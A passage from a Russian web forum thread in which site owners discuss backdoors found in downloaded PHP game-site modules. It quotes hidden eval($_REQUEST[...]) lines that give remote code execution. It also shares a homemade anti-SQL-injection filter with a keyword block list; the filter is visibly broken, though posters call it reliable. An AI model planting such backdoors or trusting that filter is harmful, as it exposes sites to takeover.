Дыры на сайтах

  • Автор темы agamurat
  • Дата начала
MrMatnoos
Участник
Сообщения
198
Реакции
42
Skype
  • #201
Kamikadze написал(а):
Вообщем удалил все строку... работает все...странно
Я просто с сайта скачивал, где без дыр модулей не бывает.:D
 
Rubrika
Участник
Сообщения
342
Реакции
43
  • #202
Mrmatnoos написал(а):
Я просто с сайта скачивал, где без дыр модулей не бывает.:D
а что за модуль-то?)
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
  • #203
Rubrika написал(а):
а что за модуль-то?)
если правильно понял пожертвование

у меня вообще такого кода нету
 
Kamikadze
Местный
Сообщения
53
Реакции
5
  • #204
kvozimir написал(а):
если правильно понял пожертвование

у меня вообще такого кода нету
Я точно тут его скачивал, еще на старой ветки про модули....вроде от туда брал его.
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #205
Мужики сегодня обнаружил это в логах ,что это и как попало ко мне на сайт : ? подскажите кто сталкивался пожалуйста

[Tue Apr 21 10:18:25 2015] [info] [client 176.109.224.223:18989] AH00128: File does not exist: /home/a/(адрес моего сайта)/public_html/++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xed\xe5+\xed\xe0\xf8\xeb\xee\xf1\xfc+\xf4\xee\xf0\xec\xfb+\xe4\xeb\xff+\xee\xf2\xef\xf0\xe0\xe2\xea\xe8;, referer http://(адрес моего сайта) /++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;
 
himik
Участник
Сообщения
230
Реакции
32
  • #206
nikitin2016 написал(а):
Мужики сегодня обнаружил это в логах ,что это и как попало ко мне на сайт : ? подскажите кто сталкивался пожалуйста

[Tue Apr 21 10:18:25 2015] [info] [client 176.109.224.223:18989] AH00128: File does not exist: /home/a/(адрес моего сайта)/public_html/++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xed\xe5+\xed\xe0\xf8\xeb\xee\xf1\xfc+\xf4\xee\xf0\xec\xfb+\xe4\xeb\xff+\xee\xf2\xef\xf0\xe0\xe2\xea\xe8;, referer http://(адрес моего сайта) /++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;
Не обращай внимания,тут ничего опасного нет)
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #207
по моему это вирус или попытка засунуть мне вирус? нашел его в логах ошибках . А удачные попытки загрузки шелов и вирусов надо смотреть в логах : success ?
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #208
Мне написали в вконтакте , что мою ферму пытаются взломать после открытия и недели не прошло , и видят некоторые мои директории , всеми указанными способами здесь на форуме закрылся , но эти гады пишут что видят мои файлы и папки , что делать кто подскажет ? ? ?
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #209
что за файл : fancybox.js и что в нем должно быть ? У меня он пустой
 
skroliks
PHP, MySQL, CSS
Участник
Сообщения
280
Реакции
46
  • #210
nikitin2016 написал(а):
Мне написали в вконтакте , что мою ферму пытаются взломать после открытия и недели не прошло , и видят некоторые мои директории , всеми указанными способами здесь на форуме закрылся , но эти гады пишут что видят мои файлы и папки , что делать кто подскажет ? ? ?
Видят - не значит что могут изменять, правильно? И вообще - есть такой тип людей, каких хлебом не корми - дай кого-то потроллить.. :)
 
Viktor
Участник
Сообщения
734
Реакции
113
  • #211
MrMatnoos написал(а):
Нашёл защиту этой инъекции.. Там стоит код: если в коде пропадёт строчка eval($_REQUEST['db_donations']); die();, то активируются дополнительные теги <?, тем самым вызывая пустую страницу. Вот что значит автор постарался :D.
Я удалил только: eval($_REQUEST['db_donations']); и всё работает. Но закрыл ли я дыру этим - не знаю.
 
skroliks
PHP, MySQL, CSS
Участник
Сообщения
280
Реакции
46
  • #212
Код:
error_reporting(0); // вывод ошибок


if($_GET['menu']!='admin4ik' && 'support'){
function limpiarez($mensaje){
$mensaje = htmlspecialchars(trim($mensaje));
$mensaje = str_replace("'","&prime;",$mensaje);
$mensaje = str_replace(";","&brvbar;",$mensaje);
$mensaje = str_replace("$"," USD ",$mensaje);
$mensaje = str_replace("<","&lang;",$mensaje);
$mensaje = str_replace(">","&rang;",$mensaje);
$mensaje = str_replace('"',"&rdquo;",$mensaje);
$mensaje = str_replace("%27"," ",$mensaje);
$mensaje = str_replace("0x29"," ",$mensaje);
$mensaje = str_replace("&amp amp ","&",$mensaje);
return $mensaje;
}

foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=limpiarez($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=limpiarez($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=limpiarez($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=limpiarez($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=limpiarez($_COOKIE[$i]);}


foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=stripslashes($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=stripslashes($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=stripslashes($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=stripslashes($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=stripslashes($_COOKIE[$i]);}

################## Фильтрация всех POST и GET #######################################
function filter_sf(&$sf_array)
{
while (list ($X,$D) = each ($sf_array)):
$sf_array[$X] = limpiarez(mysql_escape_string(strip_tags(htmlspecialchars($D))));
endwhile;
}
filter_sf($_GET);
filter_sf($_POST);
#####################################################################################

function anti_sql()
{
$check = html_entity_decode( urldecode( $_SERVER['REQUEST_URI'] ) );
$check = str_replace( "", "/", $check );

$check = mysql_real_escape_string($str);
$check = trim($str);
$check = array("AND","UNION","SELECT","WHERE","INSERT","UPDATE","DELETE","OUTFILE","FROM","OR","SHUTDOWN","CHANGE","MODIFY","RENAME","RELOAD","ALTER","GRANT","DROP","CONCAT","cmd","exec");
$check = str_replace($check,"",$str);

if( $check )
{
if((strpos($check, '<')!==false) || (strpos($check, '>')!==false) || (strpos($check, '"')!==false) || (strpos($check,"'")!==false) || (strpos($check, '*')!==false) || (strpos($check, '(')!==false) || (strpos($check, ')')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) )
{
$prover = true;
}

if((strpos($check, 'src')!==false) || (strpos($check, 'img')!==false) || (strpos($check, 'OR')!==false) || (strpos($check, 'Image')!==false) || (strpos($check, 'script')!==false) || (strpos($check, 'javascript')!==false) || (strpos($check, 'language')!==false) || (strpos($check, 'document')!==false) || (strpos($check, 'cookie')!==false) || (strpos($check, 'gif')!==false) || (strpos($check, 'png')!==false) || (strpos($check, 'jpg')!==false) || (strpos($check, 'js')!==false) )
{
$prover = true;
}

}

if (isset($prover))
{
die( "Попытка атаки на сайт или введены запрещённые символы!" );
return false;
exit;
}
}
anti_sql();

}
А кто что скажет про этот код защиты от sql-инъекций? Он вообще работает? И если да - как надежно?
 
Viktor
Участник
Сообщения
734
Реакции
113
  • #213
skroliks написал(а):
Код:
error_reporting(0); // вывод ошибок


if($_GET['menu']!='admin4ik' && 'support'){
function limpiarez($mensaje){
$mensaje = htmlspecialchars(trim($mensaje));
$mensaje = str_replace("'","&prime;",$mensaje);
$mensaje = str_replace(";","&brvbar;",$mensaje);
$mensaje = str_replace("$"," USD ",$mensaje);
$mensaje = str_replace("<","&lang;",$mensaje);
$mensaje = str_replace(">","&rang;",$mensaje);
$mensaje = str_replace('"',"&rdquo;",$mensaje);
$mensaje = str_replace("%27"," ",$mensaje);
$mensaje = str_replace("0x29"," ",$mensaje);
$mensaje = str_replace("&amp amp ","&",$mensaje);
return $mensaje;
}

foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=limpiarez($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=limpiarez($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=limpiarez($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=limpiarez($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=limpiarez($_COOKIE[$i]);}


foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=stripslashes($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=stripslashes($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=stripslashes($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=stripslashes($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=stripslashes($_COOKIE[$i]);}

################## Фильтрация всех POST и GET #######################################
function filter_sf(&$sf_array)
{
while (list ($X,$D) = each ($sf_array)):
$sf_array[$X] = limpiarez(mysql_escape_string(strip_tags(htmlspecialchars($D))));
endwhile;
}
filter_sf($_GET);
filter_sf($_POST);
#####################################################################################

function anti_sql()
{
$check = html_entity_decode( urldecode( $_SERVER['REQUEST_URI'] ) );
$check = str_replace( "", "/", $check );

$check = mysql_real_escape_string($str);
$check = trim($str);
$check = array("AND","UNION","SELECT","WHERE","INSERT","UPDATE","DELETE","OUTFILE","FROM","OR","SHUTDOWN","CHANGE","MODIFY","RENAME","RELOAD","ALTER","GRANT","DROP","CONCAT","cmd","exec");
$check = str_replace($check,"",$str);

if( $check )
{
if((strpos($check, '<')!==false) || (strpos($check, '>')!==false) || (strpos($check, '"')!==false) || (strpos($check,"'")!==false) || (strpos($check, '*')!==false) || (strpos($check, '(')!==false) || (strpos($check, ')')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) )
{
$prover = true;
}

if((strpos($check, 'src')!==false) || (strpos($check, 'img')!==false) || (strpos($check, 'OR')!==false) || (strpos($check, 'Image')!==false) || (strpos($check, 'script')!==false) || (strpos($check, 'javascript')!==false) || (strpos($check, 'language')!==false) || (strpos($check, 'document')!==false) || (strpos($check, 'cookie')!==false) || (strpos($check, 'gif')!==false) || (strpos($check, 'png')!==false) || (strpos($check, 'jpg')!==false) || (strpos($check, 'js')!==false) )
{
$prover = true;
}

}

if (isset($prover))
{
die( "Попытка атаки на сайт или введены запрещённые символы!" );
return false;
exit;
}
}
anti_sql();

}
skroliks написал(а):
А кто что скажет про этот код защиты от sql-инъекций? Он вообще работает? И если да - как надежно?
Ставил на все свои проекты, вроде работает, ни разу не взломали. Но еще зависит от хостинга.
 
korozist
Участник
Сообщения
8
Реакции
4
Skype
  • #214
skroliks написал(а):
Код:
error_reporting(0); // вывод ошибок


if($_GET['menu']!='admin4ik' && 'support'){
function limpiarez($mensaje){
$mensaje = htmlspecialchars(trim($mensaje));
$mensaje = str_replace("'","&prime;",$mensaje);
$mensaje = str_replace(";","&brvbar;",$mensaje);
$mensaje = str_replace("$"," USD ",$mensaje);
$mensaje = str_replace("<","&lang;",$mensaje);
$mensaje = str_replace(">","&rang;",$mensaje);
$mensaje = str_replace('"',"&rdquo;",$mensaje);
$mensaje = str_replace("%27"," ",$mensaje);
$mensaje = str_replace("0x29"," ",$mensaje);
$mensaje = str_replace("&amp amp ","&",$mensaje);
return $mensaje;
}

foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=limpiarez($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=limpiarez($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=limpiarez($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=limpiarez($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=limpiarez($_COOKIE[$i]);}


foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=stripslashes($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=stripslashes($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=stripslashes($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=stripslashes($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=stripslashes($_COOKIE[$i]);}

################## Фильтрация всех POST и GET #######################################
function filter_sf(&$sf_array)
{
while (list ($X,$D) = each ($sf_array)):
$sf_array[$X] = limpiarez(mysql_escape_string(strip_tags(htmlspecialchars($D))));
endwhile;
}
filter_sf($_GET);
filter_sf($_POST);
#####################################################################################

function anti_sql()
{
$check = html_entity_decode( urldecode( $_SERVER['REQUEST_URI'] ) );
$check = str_replace( "", "/", $check );

$check = mysql_real_escape_string($str);
$check = trim($str);
$check = array("AND","UNION","SELECT","WHERE","INSERT","UPDATE","DELETE","OUTFILE","FROM","OR","SHUTDOWN","CHANGE","MODIFY","RENAME","RELOAD","ALTER","GRANT","DROP","CONCAT","cmd","exec");
$check = str_replace($check,"",$str);

if( $check )
{
if((strpos($check, '<')!==false) || (strpos($check, '>')!==false) || (strpos($check, '"')!==false) || (strpos($check,"'")!==false) || (strpos($check, '*')!==false) || (strpos($check, '(')!==false) || (strpos($check, ')')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) )
{
$prover = true;
}

if((strpos($check, 'src')!==false) || (strpos($check, 'img')!==false) || (strpos($check, 'OR')!==false) || (strpos($check, 'Image')!==false) || (strpos($check, 'script')!==false) || (strpos($check, 'javascript')!==false) || (strpos($check, 'language')!==false) || (strpos($check, 'document')!==false) || (strpos($check, 'cookie')!==false) || (strpos($check, 'gif')!==false) || (strpos($check, 'png')!==false) || (strpos($check, 'jpg')!==false) || (strpos($check, 'js')!==false) )
{
$prover = true;
}

}

if (isset($prover))
{
die( "Попытка атаки на сайт или введены запрещённые символы!" );
return false;
exit;
}
}
anti_sql();

}
А кто что скажет про этот код защиты от sql-инъекций? Он вообще работает? И если да - как надежно?
подскажите кто нибудь, куда вставлять этот код ?
 
Viktor
Участник
Сообщения
734
Реакции
113
  • #215
korozist написал(а):
подскажите кто нибудь, куда вставлять этот код ?
описание же должно быть.
на форуме есть тема, используйте поиск: код защиты от sql-инъекций
 
skroliks
PHP, MySQL, CSS
Участник
Сообщения
280
Реакции
46
  • #216
korozist написал(а):
подскажите кто нибудь, куда вставлять этот код ?
В корневой папке файл index.php после начала функции, после <?PHP
 
Sidr23
Местный
Сообщения
54
Реакции
3
  • #217
А вот эта строка:
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
Блин в топ 10 модуль!
В частности выделенное жирным....
Если удалить, то стр пустая!?! Вот теперь ломаю голову, есть ответы?
 
Последнее редактирование:
Sidr23
Местный
Сообщения
54
Реакции
3
  • #218
Так метод научного тыка, привел к тому что удалил весь блок, все заработало!
а если точнее то вот это из кода ввон:
<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
 
Sidr23
Местный
Сообщения
54
Реакции
3
  • #219
nikitin2016 написал(а):
Мне написали в вконтакте , что мою ферму пытаются взломать после открытия и недели не прошло , и видят некоторые мои директории , всеми указанными способами здесь на форуме закрылся , но эти гады пишут что видят мои файлы и папки , что делать кто подскажет ? ? ?
слей себе прогу jsky и сделай скан скрипта, ты увидишь его структуру и за одно проверишь свой на инъекции
ЗЫ Если не найдешь могу скинуть
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #220
Sidr23 написал(а):
слей себе прогу jsky и сделай скан скрипта, ты увидишь его структуру и за одно проверишь свой на инъекции
ЗЫ Если не найдешь могу скинуть
скинь пожалуйста
 
Сверху